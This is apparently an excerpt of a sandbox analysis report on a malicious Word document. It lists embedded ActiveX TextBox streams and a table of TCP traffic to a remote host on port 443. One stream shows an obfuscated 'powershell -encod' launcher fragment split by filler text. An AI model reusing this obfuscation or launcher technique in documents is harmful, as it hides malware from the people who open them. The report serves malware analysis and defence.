                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480610/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.55677964945
                Base64 Encoded:False
                Data ASCII:h . j . j . z . V . w . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480610/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480610/contents
                File Type:data
                Stream Size:64
                Entropy:3.5759867178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . A 1 U H A m Z o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                General
                Stream Path:ObjectPool/_1630480611/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480611/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:c . Z . D . u . V . z . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480611/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480611/contents
                File Type:data
                Stream Size:64
                Entropy:3.59544160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . K n 0 G i z u o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                General
                Stream Path:ObjectPool/_1630480612/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480612/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.9166422781
                Base64 Encoded:False
                Data ASCII:J . S . E . p . 1 . H . h . . . . . . .
                General
                Stream Path:ObjectPool/_1630480612/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480612/contents
                File Type:data
                Stream Size:64
                Entropy:3.6384867178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . h W h L U R B o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                General
                Stream Path:ObjectPool/_1630480613/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480613/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:u . X . S . v . z . Y . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480613/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480613/contents
                File Type:data
                Stream Size:64
                Entropy:3.62669160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . V U d D k j i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                General
                Stream Path:ObjectPool/_1630480614/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480614/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.9166422781
                Base64 Encoded:False
                Data ASCII:G . o . W . s . R . h . k . . . . . . .
                General
                Stream Path:ObjectPool/_1630480614/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480614/contents
                File Type:data
                Stream Size:64
                Entropy:3.56419160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . U 5 B T r F i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                General
                Stream Path:ObjectPool/_1630480615/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480615/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.8166422781
                Base64 Encoded:False
                Data ASCII:z . J . W . s . p . w . z . . . . . . .
                General
                Stream Path:ObjectPool/_1630480615/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480615/contents
                File Type:data
                Stream Size:92
                Entropy:4.21099943606
                Base64 Encoded:False
                Data ASCII:. . < . . . @ . . . . . . H . , " . . . . . . . . . . . p o w e I u H 3 r s h e I u H 3 l l - I u H 3 e n c o I u H 3 d . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                General
                Stream Path:ObjectPool/_1630480616/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480616/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.8166422781
                Base64 Encoded:False
                Data ASCII:k . E . 4 . i . Q . Q . r . . . . . . .
                General
                Stream Path:ObjectPool/_1630480616/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480616/contents
                File Type:data
                Stream Size:64
                Entropy:3.59544160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . q U l w A m i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                General
                Stream Path:ObjectPool/_1630480617/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480617/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:T . R . F . 9 . W . z . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480617/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480617/contents
                File Type:data
                Stream Size:64
                Entropy:3.6072367178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . W f H 3 t O j h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                General
                Stream Path:ObjectPool/_1630480618/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480618/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:q . i . j . k . Y . G . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480618/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480618/contents
                File Type:data
                Stream Size:64
                Entropy:3.62669160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . V v P j m 4 i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                General
                Stream Path:ObjectPool/_1630480619/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480619/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.9166422781
                Base64 Encoded:False
                Data ASCII:b . t . n . 5 . h . V . S . . . . . . .
                General
                Stream Path:ObjectPool/_1630480619/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480619/contents
                File Type:data
                Stream Size:64
                Entropy:3.6072367178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . q v k E Y l v h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                General
                Stream Path:ObjectPool/_1630480620/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480620/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:G . U . l . 0 . L . E . . . . . . . . .
                General
                Stream Path:ObjectPool/_1630480620/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480620/\x3PRINT
                File Type:data
                Stream Size:452
                Entropy:3.30350617225
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . i i i . . . . . . . - . . .
                General
                Stream Path:ObjectPool/_1630480620/contents
                File Type:data
                Stream Size:64
                Entropy:3.6072367178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . B f C z m t b M . . . . 5 . . . . . . . . . . . . . . . C a l i b r i M
                General
                Stream Path:WordDocument
                File Type:data
                Stream Size:5678
                Entropy:3.54565498894
                Base64 Encoded:False
                Data ASCII:. . . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . f . [ f f . [ f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | . . . . . . . | . . . . . . . | . . . . . . . | . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ .

                Network Behavior

                Network Port Distribution

                TCP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Sep 20, 2019 13:30:08.694078922 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.694133043 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694216013 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694328070 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694391012 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.694433928 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694539070 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694632053 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694634914 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.694798946 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694840908 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694953918 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694992065 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.695050001 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695154905 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695200920 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.695245981 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695348978 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695395947 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.695472956 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695568085 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695621014 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.698884964 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.819525003 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.819581985 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.819667101 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.819740057 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.819850922 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.819859028 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.820059061 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820101976 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820159912 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820250988 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820353985 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.820359945 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820462942 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820560932 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820611954 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.820693970 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820811033 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.820816994 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820911884 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820962906 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821022987 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.821094036 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821182966 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821274996 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821281910 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.821387053 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821469069 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.821537018 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821625948 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821717978 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821799040 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.821818113 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821913958 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821976900 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.822004080 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822113991 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822201014 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822297096 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.822299004 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822439909 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822510958 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822602034 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.822619915 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822711945 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822771072 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.822876930 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822952032 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.823030949 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.823131084 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.823132992 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.824213982 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.824306011 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.824383974 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.826369047 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.945377111 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945451021 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945477009 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945574045 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945748091 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945817947 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945847034 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.945908070 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945982933 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946075916 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946114063 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.946260929 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946310997 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946384907 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946496964 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.946527958 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946590900 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946679115 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.946690083 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946815014 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946897030 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947016001 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947047949 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.947160006 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947202921 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947285891 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.947335958 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947396994 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947489977 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.947514057 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947664022 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947705984 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947802067 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.947813988 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947922945 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.948246002 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.948723078 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.948782921 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.948903084 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.949142933 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.951946020 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.951987028 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952092886 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952177048 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952256918 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952312946 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.952347994 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952460051 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952492952 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952537060 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.952570915 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952677011 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952735901 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.952791929 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952908993 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952913046 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.953056097 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953138113 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953205109 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.953243017 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953361988 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953453064 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953561068 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.953572035 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953665972 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953756094 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953811884 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953845978 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.953959942 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.954004049 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.954112053 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.954145908 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.954222918 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.954308033 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.954332113 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.960114956 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.071343899 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071379900 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071408987 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071523905 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071603060 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.071615934 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071739912 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071780920 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.071871042 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071960926 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.072030067 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.074462891 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.074592113 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.074664116 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.074763060 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.074798107 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.074887991 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.074996948 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.074997902 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075078011 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075175047 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075190067 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.075290918 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075449944 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075488091 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075503111 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.075607061 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075644016 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.075699091 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075781107 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.075798988 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075900078 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075994968 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076026917 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.076138973 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076239109 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076297998 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.076329947 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076423883 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076513052 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076538086 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.077749014 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.085689068 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.085767031 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.085860014 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.085870028 CEST44349163198.49.65.242192.168.1.16
